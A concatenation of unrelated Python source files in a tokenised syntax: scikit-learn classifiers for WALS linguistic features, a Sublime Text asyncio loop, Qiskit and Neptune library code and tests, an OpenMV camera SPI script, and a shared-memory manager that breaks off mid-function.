"""Simple sckit-learn classification utilities."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_future_stmt> unicode_literals<import_stmt>math<import_stmt>pickle<import_from_stmt>absl flags<import_from_stmt>absl logging<import_stmt>numpy<as>np<import_from_stmt>sklearn model_selection<import_from_stmt>sklearn.compose make_column_transformer<import_from_stmt>sklearn.discriminant_analysis LinearDiscriminantAnalysis<import_from_stmt>sklearn.discriminant_analysis QuadraticDiscriminantAnalysis<import_from_stmt>sklearn.ensemble AdaBoostClassifier<import_from_stmt>sklearn.ensemble BaggingClassifier<import_from_stmt>sklearn.ensemble RandomForestClassifier<import_from_stmt>sklearn.gaussian_process GaussianProcessClassifier<import_from_stmt>sklearn.linear_model LogisticRegression<import_from_stmt>sklearn.linear_model RidgeClassifier<import_from_stmt>sklearn.model_selection RepeatedStratifiedKFold<import_from_stmt>sklearn.naive_bayes GaussianNB<import_from_stmt>sklearn.neural_network MLPClassifier<import_from_stmt>sklearn.preprocessing OneHotEncoder<import_from_stmt>sklearn.preprocessing StandardScaler<import_from_stmt>sklearn.svm LinearSVC<import_from_stmt>sklearn.tree DecisionTreeClassifier<line_sep># pylint: disable=invalid-name
flags.DEFINE_boolean("transform_inputs" <true> "If enabled, will scale the numeric features and convert categorical "<concat>"features to one-hot encoding.")<line_sep>flags.DEFINE_list("classifiers" ["LogisticRegression"] "Type of the classifier. One of: \"LogisticRegression\", \"SVM\", "<concat>"\"RidgeRegression\", \"RandomForest\", \"AdaBoost\", \"LDA\", \"QDA\", "<concat>"\"GaussianProcess\", \"DecisionTree\", \"DNN\", \"GaussianNaiveBayes\", "<concat>"\"BaggingEnsemble\".")<line_sep>flags.DEFINE_boolean("use_implicationals" <true> "If True, use the implicational features.")<line_sep>flags.DEFINE_string("best_configurations_file" "" "File containing the JSON dictionary from feature names to the "<concat>"respective best model and data configurations. When `--cross_validate` "<concat>"is enabled, this is the output file to be generated. In all other modes "<concat>"this is an input file.")<line_sep>FLAGS=flags.FLAGS<line_sep># List of all supported classifiers.
ALL_MODELS=["AdaBoost" "DNN" "DecisionTree" "GaussianProcess" "LDA" "LogisticRegression" "QDA" "RandomForest" "RidgeRegression" "SVM" "GaussianNaiveBayes" "BaggingEnsemble"]<line_sep># Model information keys.
MODEL_INFO_NAME_KEY="name"<line_sep>MODEL_INFO_SPARSITY_KEY="no_cv"# Not enough data.
MODEL_INFO_SCORE_KEY="accuracy"<line_sep>MODEL_INFO_CANDIDATES_KEY="candidates"<line_sep># Random seed.
_RANDOM_STATE=4611170<line_sep># WALS language code.
_LANGUAGE_CODE="wals_code"<def_stmt>_prepare_data input_df<block_start>"""Splits data into features and labels."""<line_sep>class_label="target_value"<line_sep>y=input_df[class_label].copy()<line_sep>X_columns_to_drop=[class_label _LANGUAGE_CODE "target_feature"]<line_sep>X=input_df.drop(columns=X_columns_to_drop)<line_sep><return>X y<block_end><def_stmt>_split_into_features_and_labels feature_name feature_maker training_df dev_df transform_inputs<block_start>"""Preprocesses the data and returns the features and labels."""<line_sep># Get the label class counts for the training data.
train_class_counts=training_df.target_value.value_counts()<line_sep>train_class_counts=list(zip(train_class_counts.index train_class_counts.values))<line_sep>logging.info("%s: Class counts: %s" feature_name train_class_counts)<line_sep># Perform the split into features and labels of the training set.
X_train,y_train=_prepare_data(training_df)<line_sep>logging.info("%s: Input feature dimensions: %s" feature_name X_train.shape[1])<line_sep># Split dev set.
X_dev,y_dev=_prepare_data(dev_df)<line_sep># Numeric columns are transformed using standard scaler and categorical
# columns are converted to one-hot.
<if_stmt>transform_inputs<block_start>numeric_cols=["latitude" "longitude"]<line_sep>categorical_cols=[]<for_stmt>col_name X_train.columns<block_start><if_stmt>(col_name<in>feature_maker.prob_features<or>col_name<in>feature_maker.count_features)<block_start>numeric_cols.append(col_name)# Counts, probabilities.
<block_end><elif_stmt>col_name<in>feature_maker.categorical_features<block_start>categorical_cols.append(col_name)# Categorical feature values.
<block_end><block_end>inputs_transformer=make_column_transformer((StandardScaler() numeric_cols) (OneHotEncoder(handle_unknown="ignore") categorical_cols) remainder="passthrough")<line_sep>X_train=inputs_transformer.fit_transform(X_train)<if_stmt>X_dev.shape[0]# Do we have enough samples?
<block_start>X_dev=inputs_transformer.transform(X_dev)<block_end><else_stmt><block_start>logging.warning("Feature %s not found in the dev set. This is likely to "<concat>"crash the evaluation mode!" feature_name)<block_end><block_end><else_stmt># Transform data frames to Numpy. The input transformer in the branch above
# returns Numpy arrays.
<block_start>X_train=X_train.to_numpy()<line_sep>X_dev=X_dev.to_numpy()<block_end><return>(X_train y_train.to_numpy() X_dev y_dev.to_numpy() train_class_counts)<block_end><def_stmt>prepare_data feature_maker feature_name use_implicationals=<true> prediction_mode=<false><block_start>"""Prepares the features and labels for the given WALS feature name."""<line_sep># Process training and dev data for the feature. Store the WALS language codes
# for the development set aside.
training_df,dev_df=feature_maker.process_data(feature_name prediction_mode=prediction_mode)<assert_stmt>_LANGUAGE_CODE<in>dev_df.columns<line_sep>dev_language_codes=list(dev_df[_LANGUAGE_CODE].values)<if_stmt><not>use_implicationals<block_start>logging.info("Discarding implicational features")<line_sep>training_df=feature_maker.select_columns(training_df discard_implicationals=<true>)<line_sep>dev_df=feature_maker.select_columns(dev_df discard_implicationals=<true>)<block_end># Split the data into features and labels.
X_train,y_train,X_dev,y_dev,train_class_counts=(_split_into_features_and_labels(feature_name feature_maker training_df dev_df FLAGS.transform_inputs))<line_sep><return>X_train y_train X_dev y_dev dev_language_codes train_class_counts<block_end><def_stmt>_make_classifier classifier_name<block_start>"""Classifier factory."""<line_sep># Class weights: if you set this to None, you'd get much better accuracies,
# but it's likely that the classifier will be overpredicting the majority
# class.
class_weight_strategy=<none># Note: this may set "balanced" as default.
max_iters=10000<if_stmt>classifier_name<eq>"AdaBoost"<block_start>model=AdaBoostClassifier(n_estimators=100)<block_end><elif_stmt>classifier_name<eq>"LogisticRegression"<block_start>model=LogisticRegression(max_iter=max_iters class_weight=class_weight_strategy)<block_end><elif_stmt>classifier_name<eq>"LDA"<block_start>model=LinearDiscriminantAnalysis(tol=1E-6)<block_end><elif_stmt>classifier_name<eq>"QDA"<block_start>model=QuadraticDiscriminantAnalysis()<block_end><elif_stmt>classifier_name<eq>"DNN"<block_start>model=MLPClassifier(random_state=_RANDOM_STATE hidden_layer_sizes=[200])<block_end><elif_stmt>classifier_name<eq>"DecisionTree"<block_start>model=DecisionTreeClassifier(random_state=_RANDOM_STATE min_samples_leaf=3 criterion="entropy" class_weight="balanced")<block_end><elif_stmt>classifier_name<eq>"GaussianProcess"<block_start>model=GaussianProcessClassifier(random_state=_RANDOM_STATE max_iter_predict=200)<block_end><elif_stmt>classifier_name<eq>"RandomForest"<block_start>model=RandomForestClassifier(n_estimators=200 random_state=_RANDOM_STATE min_samples_leaf=3 criterion="entropy" class_weight="balanced_subsample")<block_end><elif_stmt>classifier_name<eq>"RidgeRegression"<block_start>model=RidgeClassifier(normalize=<true> tol=1E-5 class_weight=class_weight_strategy)<block_end><elif_stmt>classifier_name<eq>"SVM"<block_start>model=LinearSVC(max_iter=max_iters class_weight=class_weight_strategy)<block_end><elif_stmt>classifier_name<eq>"GaussianNaiveBayes"<block_start>model=GaussianNB()<block_end><elif_stmt>classifier_name<eq>"BaggingEnsemble"<block_start>model=BaggingClassifier(random_state=_RANDOM_STATE)<block_end><else_stmt><block_start><raise>ValueError("Unsupported classifier: %s"%classifier_name)<block_end><return>model<block_end><def_stmt>cross_validate feature_name classifier_name X y cv_num_folds cv_num_repeats<block_start>"""Runs repeated stratified $k$-fold cross-validation.
Returns multiple cross-validation metrics as a dictionary, where for each
metric mean and variance across multiple repeats and folds is summarized.
Args:
feature_name: (string) Name of the WALS feature.
classifier_name: (string) Classifier name.
X: (numpy array) Input features.
y: (numpy array) Labels.
cv_num_folds: (int) Number of folds ($k$).
cv_num_repeats: (int) Number of repetitions.
Returns:
Dictionary containing cross-validation scores and stats.
"""<line_sep>model=_make_classifier(classifier_name)<line_sep>scoring=["f1_micro" "precision_micro" "recall_micro" "accuracy"]<try_stmt># Really primitive logic to figure out class distribution.
<block_start>_,y_counts=np.unique(y return_counts=<true>)<line_sep>y_max_freq=np.max(y_counts)<line_sep># Check if the class counts are not reliable to run cross-validation.
<if_stmt>y_max_freq<l>cv_num_folds<block_start>logging.warning("[%s] %s: Not enough data. Fitting the model instead "<concat>"of running CV" feature_name classifier_name)<line_sep># Simply fit the model.
model.fit(X y)<line_sep>cv_scores={}<line_sep>cv_scores["accuracy"]=(model.score(X y) 0.0)<line_sep>cv_scores[MODEL_INFO_SPARSITY_KEY]=<true><line_sep><return>cv_scores<block_end><else_stmt><block_start>logging.info("[%s] Running cross-validation of %s (k=%d, n=%d) ..." feature_name classifier_name cv_num_folds cv_num_repeats)<line_sep># Run cross-validation.
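# RepeatedStratifiedKFold keeps the class proportions in every fold and repeats the k-fold split cv_num_repeats times with different shuffles, so each score below aggregates cv_num_folds * cv_num_repeats held-out folds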
cv=RepeatedStratifiedKFold(n_splits=cv_num_folds n_repeats=cv_num_repeats random_state=_RANDOM_STATE)<line_sep>cv_scores=model_selection.cross_validate(model X y cv=cv scoring=scoring n_jobs=cv_num_folds)<line_sep>cv_scores[MODEL_INFO_SPARSITY_KEY]=<false><block_end><block_end><except_stmt>Exception<as>e# pylint: disable=broad-except
<block_start>logging.error("[%s] %s: CV: Exception: %s" feature_name classifier_name e)<line_sep><return><none><block_end><del_stmt>cv_scores["fit_time"]<del_stmt>cv_scores["score_time"]<for_stmt>score_name scoring<block_start>scores_vec_key="test_"+score_name<line_sep>cv_scores[score_name]=(np.mean(cv_scores[scores_vec_key]) np.var(cv_scores[scores_vec_key]))<del_stmt>cv_scores[scores_vec_key]<block_end># Sanity check.
<if_stmt>math.isnan(cv_scores["accuracy"][0])<block_start><return><none><block_end>logging.info("[train] %s: CV scores for %s: %s" feature_name classifier_name cv_scores)<line_sep><return>cv_scores<block_end><def_stmt>train_classifier feature_name classifier_name X y model_path=<none><block_start>"""Trains classifier."""<line_sep>model=_make_classifier(classifier_name)<line_sep>logging.info("%s: Fitting %s model ..." feature_name classifier_name)<line_sep>model.fit(X y)<line_sep>logging.info("%s: %s: Score: %s" feature_name classifier_name model.score(X y))<if_stmt>model_path<block_start>logging.info("Saving model to \"%s\" ..." model_path)<line_sep>pickle.dump(model open(model_path "wb"))<block_end><return>model<block_end><def_stmt>select_best_model classifiers feature_name X_train y_train cv_num_folds cv_num_repeats<block_start>"""Performs cross-validation of various classifiers for a given feature.
Returns a dictionary with the best classifier name, its score and the number
of candidates it was selected from.
Args:
classifiers: (list) Names of the classifiers to choose from.
feature_name: (string) WALS feature name.
X_train: (numpy array) Training features.
y_train: (numpy array) Training labels.
cv_num_folds: (int) Number of folds ($k$).
cv_num_repeats: (int) Number of repetitions.
Returns:
Dictionary containing best configuration.
"""<line_sep>scores=[]<for_stmt>classifier_name classifiers<block_start>clf_scores=cross_validate(feature_name classifier_name X_train y_train cv_num_folds cv_num_repeats)<if_stmt>clf_scores# Cross-validation may fail for some settings.
<block_start>scores.append((classifier_name clf_scores))<block_end><block_end># Sort the scores by the highest accuracy mean. For some reason F1 and
# accuracy are the same (as is the precision and recall). Investigate.
scores=sorted(scores key=<lambda>score:score[1]["accuracy"][0] reverse=<true>)<if_stmt>len(scores)<l>5<block_start><raise>ValueError("Expected at least five candidate classifiers!")<block_end>best_model=scores[0]<line_sep><return>{MODEL_INFO_NAME_KEY:best_model[0] # Model name.
# Accuracy mean.
MODEL_INFO_SCORE_KEY:best_model[1]["accuracy"][0] # Boolean sparsity marker.
MODEL_INFO_SPARSITY_KEY:best_model[1][MODEL_INFO_SPARSITY_KEY] # Overall number of successful evals.
MODEL_INFO_CANDIDATES_KEY:len(scores)}<block_end>
|
<import_from_future_stmt> annotations<import_stmt>asyncio<import_stmt>sublime<import_stmt>threading<class_stmt>Handle<block_start><def_stmt>__init__ self callback args<block_start>self.callback=callback<line_sep>self.args=args<block_end><def_stmt>__call__ self<block_start><if_stmt>self.callback<block_start>self.callback(*self.args)<block_end><block_end><def_stmt>cancel self<block_start>self.callback=<none><line_sep>self.args=<none><block_end><block_end><class_stmt>SublimeEventLoop(asyncio.AbstractEventLoop)<block_start><def_stmt>run_forever self<block_start><raise>NotImplementedError<block_end><def_stmt>run_until_complete self future<block_start><raise>NotImplementedError<block_end><def_stmt>stop self<block_start><raise>NotImplementedError<block_end><def_stmt>is_running self<block_start><raise>NotImplementedError<block_end><def_stmt>is_closed self<block_start><raise>NotImplementedError<block_end><def_stmt>close self<block_start><raise>NotImplementedError<block_end><def_stmt>shutdown_asyncgens self<block_start><raise>NotImplementedError<block_end># Methods scheduling callbacks. All these return Handles.
<def_stmt>_timer_handle_cancelled self handle<block_start><raise>NotImplementedError<block_end><def_stmt>call_soon self callback *args context=<none><block_start>handle=Handle(callback args)<line_sep>sublime.set_timeout(handle 0)<line_sep><return>handle<block_end><def_stmt>call_later self delay callback *args context=<none><block_start>handle=Handle(callback args)<line_sep>sublime.set_timeout(handle delay<times>1000)<line_sep><return>handle<block_end><def_stmt>call_at self when callback *args<block_start><raise>NotImplementedError<block_end><def_stmt>time self<block_start><raise>NotImplementedError<block_end><def_stmt>create_future self<block_start><return>asyncio.futures.Future(loop=self)<block_end># Method scheduling a coroutine object: create a task.
<def_stmt>create_task self coro<block_start>task=asyncio.tasks.Task(coro loop=self)<if_stmt>task._source_traceback#type: ignore
<block_start><del_stmt>task._source_traceback[-1]#type: ignore
<block_end><return>task<block_end># Methods for interacting with threads.
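# assumption: sublime.set_timeout may be called from any thread, so call_soon_threadsafe can simply delegate to call_later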
<def_stmt>call_soon_threadsafe self callback *args<block_start><return>self.call_later(0 callback *args)<block_end><def_stmt>run_in_executor self executor func *args<block_start><raise>NotImplementedError<block_end><def_stmt>set_default_executor self executor<block_start><raise>NotImplementedError<block_end># Task factory.
<def_stmt>set_task_factory self factory<block_start><raise>NotImplementedError<block_end><def_stmt>get_task_factory self<block_start><raise>NotImplementedError<block_end># Error handlers.
<def_stmt>get_exception_handler self<block_start><raise>NotImplementedError<block_end><def_stmt>set_exception_handler self handler<block_start><raise>NotImplementedError<block_end><def_stmt>default_exception_handler self context<block_start><raise>NotImplementedError<block_end><def_stmt>call_exception_handler self context<block_start><import_from_stmt>.log log_exception<import_from_stmt>.error Error<try_stmt><block_start><if_stmt>'exception'<in>context<block_start><raise>context['exception']<block_end><else_stmt><block_start><raise>Error(context['message'])<block_end><block_end><except_stmt>Exception<as>e<block_start>log_exception()<block_end><block_end># Debug flag management.
<def_stmt>get_debug self<block_start><return><false><block_end><def_stmt>set_debug self enabled<block_start><raise>NotImplementedError<block_end><block_end>
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""The Base Operator Transformer interface."""<import_from_stmt>abc ABC abstractmethod<import_from_stmt>typing Any<class_stmt>BaseTransformer(ABC)<block_start>"""**DEPRECATED!** The interface for implementing methods which map from one `QMolecule` or
'WatsonHamiltonian' to another. These methods may or may not affect the size of the Hilbert
space.
"""<line_sep>@abstractmethod<def_stmt>transform self molecule_data:Any<block_start>"""Transforms one `QMolecule` or 'WatsonHamiltonian' into another one. This may or may
not affect the size of the Hilbert space.
Args:
molecule_data: the `QMolecule` or 'WatsonHamiltonian' to be transformed.
Returns:
A new `QMolecule` or 'WatsonHamiltonian' instance.
"""<line_sep><raise>NotImplementedError()<block_end><block_end>
|
__all__=["CompletionPort" "Event" "accept" "connect" "get_accept_addrs" "have_connectex" "makesockaddr" "maxAddrLen" "recv" "recvfrom" "send" ]<import_from_stmt>twisted_iocpsupport.iocpsupport # type: ignore[import]
CompletionPort Event accept connect get_accept_addrs have_connectex makesockaddr maxAddrLen recv recvfrom send <line_sep>
|
#
# Copyright (c) 2020, Neptune Labs Sp. z o.o.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
<import_stmt>unittest<import_stmt>uuid<import_from_stmt>neptune.new.exceptions MetadataInconsistency<import_from_stmt>neptune.new.internal.backends.neptune_backend_mock NeptuneBackendMock<import_from_stmt>neptune.new.internal.container_type ContainerType<import_from_stmt>neptune.new.internal.run_structure ContainerStructure<import_from_stmt>neptune.new.types.value Value<class_stmt>TestRunStructure(unittest.TestCase)<block_start><def_stmt>test_get_none self<block_start>exp=ContainerStructure[int dict]()<line_sep>self.assertEqual(exp.get(["some" "path" "val"]) <none>)<block_end><def_stmt>test_get_nested_variable_fails self<block_start>exp=ContainerStructure[int dict]()<line_sep>exp.set(["some" "path" "val"] 3)<with_stmt>self.assertRaises(MetadataInconsistency)<block_start>exp.get(["some" "path" "val" "nested"])<block_end><with_stmt>self.assertRaises(MetadataInconsistency)<block_start>exp.get(["some" "path" "val" "nested" "nested"])<block_end><block_end><def_stmt>test_get_ns self<block_start>exp=ContainerStructure[int dict]()<line_sep>exp.set(["some" "path" "val"] 3)<line_sep>self.assertEqual(exp.get(["some" "path"]) {"val":3})<block_end><def_stmt>test_set self<block_start>exp=ContainerStructure[int dict]()<line_sep>exp.set(["some" "path" "val"] 3)<line_sep>self.assertEqual(exp.get(["some" "path" "val"]) 3)<block_end><def_stmt>test_set_nested_variable_fails self<block_start>exp=ContainerStructure[int dict]()<line_sep>exp.set(["some" "path" "val"] 3)<with_stmt>self.assertRaises(MetadataInconsistency)<block_start>exp.set(["some" "path" "val" "nested"] 3)<block_end><with_stmt>self.assertRaises(MetadataInconsistency)<block_start>exp.set(["some" "path" "val" "nested" "nested"] 3)<block_end><block_end><def_stmt>test_set_ns_collision self<block_start>exp=ContainerStructure[int dict]()<line_sep>exp.set(["some" "path" "val"] 3)<with_stmt>self.assertRaises(MetadataInconsistency)<block_start>exp.set(["some" "path"] 5)<block_end><block_end><def_stmt>test_pop self<block_start>exp=ContainerStructure[int dict]()<line_sep>exp.set(["some" "path" "val1"] 3)<line_sep>exp.set(["some" "path" "val2"] 5)<line_sep>exp.pop(["some" "path" "val2"])<line_sep>self.assertEqual(exp.get(["some" "path" "val1"]) 3)<line_sep>self.assertEqual(exp.get(["some" "path" "val2"]) <none>)<line_sep>self.assertTrue("some"<in>exp.get_structure()<and>"path"<in>exp.get_structure()["some"])<block_end><def_stmt>test_pop_whole_ns self<block_start>exp=ContainerStructure[int dict]()<line_sep>exp.set(["some" "path" "val"] 3)<line_sep>exp.pop(["some" "path" "val"])<line_sep>self.assertEqual(exp.get(["some" "path" "val"]) <none>)<line_sep>self.assertFalse("some"<in>exp.get_structure())<block_end><def_stmt>test_pop_not_found self<block_start>exp=ContainerStructure[int dict]()<with_stmt>self.assertRaises(MetadataInconsistency)<block_start>exp.pop(["some" "path"])<block_end><block_end><def_stmt>test_pop_ns_fail self<block_start>exp=ContainerStructure[int dict]()<line_sep>exp.set(["some" "path" "val1"] 3)<with_stmt>self.assertRaises(MetadataInconsistency)<block_start>exp.pop(["some" "path"])<block_end><block_end><block_end><class_stmt>TestIterateSubpaths(unittest.TestCase)# pylint: disable=protected-access
<block_start>project_uuid=str(uuid.uuid4())<def_stmt>setUp self<block_start>self.backend=NeptuneBackendMock()<line_sep>exp=self.backend.create_run(self.project_uuid)<line_sep># FIXME test for projects
self.structure=self.backend._containers[(exp.id ContainerType.RUN)]<line_sep>self.structure.set(["attributes" "float"] Value())<line_sep>self.structure.set(["attributes" "node" "one"] Value())<line_sep>self.structure.set(["attributes" "node" "two"] Value())<line_sep>self.structure.set(["attributes" "node" "three"] Value())<line_sep>self.structure.set(["attributes" "int"] Value())<line_sep>self.structure.set(["attributes" "string"] Value())<block_end><def_stmt>test_iterate_empty_run self<block_start>empty_structure=ContainerStructure[Value dict]()<line_sep>self.assertListEqual(list(empty_structure.iterate_subpaths([])) [])<line_sep>self.assertListEqual(list(empty_structure.iterate_subpaths(["test"])) [])<block_end><def_stmt>test_iterate_empty_prefix self<block_start>prefix=[]<line_sep>expected_subpaths=["sys/id" "sys/state" "sys/owner" "sys/size" "sys/tags" "sys/creation_time" "sys/modification_time" "sys/failed" "attributes/float" "attributes/int" "attributes/string" "attributes/node/one" "attributes/node/two" "attributes/node/three" ]<line_sep>print(list(self.structure.iterate_subpaths(prefix)))<line_sep>self.assertListEqual(list(self.structure.iterate_subpaths(prefix)) expected_subpaths)<block_end><def_stmt>test_iterate_prefix self<block_start>prefix=["sys"]<line_sep>expected_subpaths=["sys/id" "sys/state" "sys/owner" "sys/size" "sys/tags" "sys/creation_time" "sys/modification_time" "sys/failed" ]<line_sep>self.assertListEqual(list(self.structure.iterate_subpaths(prefix)) expected_subpaths)<block_end><def_stmt>test_iterate_long_prefix self<block_start>prefix=["attributes" "node"]<line_sep>expected_subpaths=["attributes/node/one" "attributes/node/two" "attributes/node/three" ]<line_sep>self.assertListEqual(list(self.structure.iterate_subpaths(prefix)) expected_subpaths)<block_end><def_stmt>test_iterate_nonexistent_prefix self<block_start>prefix=["argh"]<line_sep>expected_subpaths=[]<line_sep>self.assertListEqual(list(self.structure.iterate_subpaths(prefix)) expected_subpaths)<block_end><block_end>
|
<import_stmt>image network rpc sensor struct<import_stmt>time<import_stmt>micropython<import_from_stmt>pyb Pin<import_from_stmt>pyb LED<line_sep># variables that can be changed
save_to_SD=<false><line_sep>sensor_format=sensor.RGB565<line_sep>#sensor_format = sensor.GRAYSCALE
# LEDs are used as an easy way to tell whether the remote camera has started correctly
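# led_control() below takes a bitmask: bit 0 = red, bit 1 = green, bit 2 = blue, bit 3 = IR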
red_led=LED(1)<line_sep>green_led=LED(2)<line_sep>blue_led=LED(3)<line_sep>ir_led=LED(4)<def_stmt>led_control x<block_start><if_stmt>(x&1)<eq>0<block_start>red_led.off()<block_end><elif_stmt>(x&1)<eq>1<block_start>red_led.on()<block_end><if_stmt>(x&2)<eq>0<block_start>green_led.off()<block_end><elif_stmt>(x&2)<eq>2<block_start>green_led.on()<block_end><if_stmt>(x&4)<eq>0<block_start>blue_led.off()<block_end><elif_stmt>(x&4)<eq>4<block_start>blue_led.on()<block_end><if_stmt>(x&8)<eq>0<block_start>ir_led.off()<block_end><elif_stmt>(x&8)<eq>8<block_start>ir_led.on()<block_end><block_end>processing=<true><line_sep># pin to trigger the snapshot
pin4=Pin('P4' Pin.IN Pin.PULL_UP)<line_sep># communication with the controller cam
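# this board acts as the SPI slave (chip select on P3); the controller cam is the master driving the bus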
interface=rpc.rpc_spi_slave(cs_pin="P3" clk_polarity=1 clk_phase=0)<line_sep># here we always choose the QVGA format (320x240) inside a VGA image
# if this is changed, the camera has to be calibrated again
# also, the logic of mask_height should be checked
img_width=320<line_sep>img_height=240<line_sep># additional data for the mask height
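# note: with these divisors the appended mask rows carry the same number of bytes in both formats, since an RGB565 row is twice as wide in bytes as a grayscale row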
<if_stmt>sensor_format<eq>sensor.RGB565<block_start>mask_height=int(img_height/8)<block_end><else_stmt><block_start>mask_height=int(img_height/4)<block_end>sensor.reset()<line_sep>sensor_size=sensor.VGA<line_sep>sensor.set_pixformat(sensor_format)<line_sep>sensor.set_framesize(sensor_size)<line_sep>sensor.set_windowing((int((sensor.width()-img_width)/2) int((sensor.height()-img_height)/2) img_width img_height))<line_sep># the following is not really needed, this is to do the same as the controller cam
sensor.skip_frames(time=2000)<line_sep>sensor.snapshot()<line_sep>################################################################
# Call Backs
################################################################
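# sensor_config applies the gain / exposure / white-balance values received from the controller cam, presumably so both cameras capture with matching manual settings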
<def_stmt>sensor_config data<block_start><global>processing<line_sep>gain_db,exposure_us,r_gain_db,g_gain_db,b_gain_db=struct.unpack("<fIfff" data)<line_sep>sensor.set_auto_gain(<false> gain_db)<line_sep>sensor.set_auto_exposure(<false> exposure_us)<line_sep>sensor.set_auto_whitebal(<false> (r_gain_db g_gain_db b_gain_db))<line_sep>processing=<false><line_sep><return>struct.pack("<fIfff" gain_db exposure_us r_gain_db g_gain_db b_gain_db)<block_end><def_stmt>raw_image_read_cb <block_start><global>processing<line_sep>interface.put_bytes(sensor.get_fb().bytearray() 5000)# timeout
processing=<false><block_end><def_stmt>raw_image_read data<block_start>interface.schedule_callback(raw_image_read_cb)<line_sep><return>bytes()<block_end><def_stmt>loop_callback <block_start><global>processing<if_stmt><not>processing<block_start><raise>Exception<block_end><block_end># Register call backs.
interface.register_callback(raw_image_read)<line_sep>interface.register_callback(sensor_config)<line_sep>interface.setup_loop_callback(loop_callback)<line_sep># a simple visual way to know the slave cam has started properly
# 2 blue blinks
led_control(4)<line_sep>time.sleep(500)<line_sep>led_control(0)<line_sep>time.sleep(500)<line_sep>led_control(4)<line_sep>time.sleep(500)<line_sep>led_control(0)<line_sep># configuration step
<try_stmt><block_start>processing=<true><line_sep>interface.loop()<block_end><except_stmt><block_start><pass><block_end>#stabilisation of the cam
sensor.skip_frames(time=2000)<line_sep># save the ref image used for the diff
#print("About to save background image...")
data_fb=sensor.alloc_extra_fb(img_width img_height sensor.RGB565)<line_sep>ref_img=sensor.alloc_extra_fb(img_width img_height sensor_format)<line_sep>img=sensor.snapshot()<line_sep>img.remap(data_fb right=<true>)<line_sep>ref_img.replace(img)<line_sep>#print("Saved background image - Now frame differencing!")
# now add an additional part that will convey the mask info
sensor.set_windowing((int((sensor.width()-img_width)/2) int((sensor.height()-img_height)/2) img_width img_height+mask_height))<line_sep># serve for ever
<while_stmt><true><block_start><try_stmt><block_start>processing=<true><while_stmt><not>pin4.value()<block_start><pass><block_end># get the image and undistort it
sent_image=sensor.snapshot()<line_sep>sent_image.remap(data_fb right=<true>)<line_sep># diff it with the ref image that has also been undistorted
sent_image.difference_special(ref_img data_fb 25 40 400 2000)<line_sep>interface.loop()<block_end><except_stmt><block_start><pass><block_end><block_end>
|
<import_stmt>tempfile<import_stmt>mmap<import_stmt>os<import_stmt>logging<import_from_stmt>exception_handler PrintGetExceptionDetails<line_sep># ***********************************************************************************
# Shared memory management
#
<class_stmt>SharedMemoryManager<block_start><def_stmt>__init__ self shmFlags=<none> name=<none> size=<none><block_start><try_stmt><block_start>self._shmFilePath='/dev/shm'<line_sep>self._shmFileName=name<if_stmt>self._shmFileName<is><none><block_start>self._shmFileName=next(tempfile._get_candidate_names())<block_end>self._shmFileSize=size<if_stmt>self._shmFileSize<is><none><block_start>self._shmFileSize=1024<times>1024<times>10<block_end># Bytes (10MB)
self._shmFileFullPath=os.path.join(self._shmFilePath self._shmFileName)<line_sep>self._shmFlags=shmFlags<line_sep># See the NOTE section here: https://docs.python.org/2/library/os.html#os.open for details on shmFlags
<if_stmt>self._shmFlags<is><none><block_start>self._shmFile=open(self._shmFileFullPath 'r+b')<line_sep>self._shm=mmap.mmap(self._shmFile.fileno() self._shmFileSize)<block_end><else_stmt><block_start>self._shmFile=os.open(self._shmFileFullPath self._shmFlags)<line_sep>os.ftruncate(self._shmFile self._shmFileSize)<line_sep>self._shm=mmap.mmap(self._shmFile self._shmFileSize mmap.MAP_SHARED mmap.PROT_WRITE|mmap.PROT_READ)<block_end># Dictionary to host reserved mem blocks
# self._mem_slots[sequenceNo] = [Begin, End] (closed interval)
self._memSlots=dict()<line_sep>logging.info('Shared memory name: {0}'.format(self._shmFileFullPath))<block_end><except_stmt><block_start>PrintGetExceptionDetails()<line_sep><raise><block_end><block_end><def_stmt>ReadBytes self memorySlotOffset memorySlotLength<block_start><try_stmt># This is Non-Zero Copy operation
# self._shm.seek(memorySlotOffset, os.SEEK_SET)
# bytesRead = self._shm.read(memorySlotLength)
# return bytesRead
#Zero-copy version
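# returning a read-only memoryview slice exposes the shared memory without copying; memoryview.toreadonly() requires Python 3.8+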
<block_start><return>memoryview(self._shm)[memorySlotOffset:memorySlotOffset+memorySlotLength].toreadonly()<block_end><except_stmt><block_start>PrintGetExceptionDetails()<line_sep><raise><block_end><block_end># Returns None if no availability
# Returns closed interval [Begin, End] address with available slot
<def_stmt>GetEmptySlot self seqNo sizeNeeded<block_start>address=<none><if_stmt>sizeNeeded<l>1<block_start><return>address<block_end># Empty memory
<if_stmt>len(self._memSlots)<l>1<block_start><if_stmt>self._shmFileSize<ge>sizeNeeded<block_start>self._memSlots[seqNo]=(0 sizeNeeded-1)<line_sep>address=(0 sizeNeeded-1)<block_end><else_stmt><block_start>address=<none><block_end><block_end><else_stmt><block_start>self._memSlots={k:v<for>k,v sorted(self._memSlots.items() key=<lambda>item:item[1])}<line_sep># find an available memory gap = sizeNeeded
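# the slots are now ordered by start address, so a single pass over consecutive intervals finds the first gap of at least sizeNeeded bytes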
prevSlotEnd=0<for_stmt>k,v self._memSlots.items()<block_start><if_stmt>(v[0]-prevSlotEnd-1)<ge>sizeNeeded<block_start>address=(prevSlotEnd+1 prevSlotEnd+sizeNeeded)<line_sep>self._memSlots[seqNo]=(address[0] address[1])<line_sep><break><block_end><else_stmt><block_start>prevSlotEnd=v[1]<block_end><block_end># no gap in between, check last possible gap
<if_stmt>address<is><none><block_start><if_stmt>(self._shmFileSize-prevSlotEnd+1)<ge>sizeNeeded<block_start>address=(prevSlotEnd+1 prevSlotEnd+sizeNeeded)<line_sep>self._memSlots[seqNo]=(address[0] address[1])<block_end><block_end><block_end># interval [Begin, End]
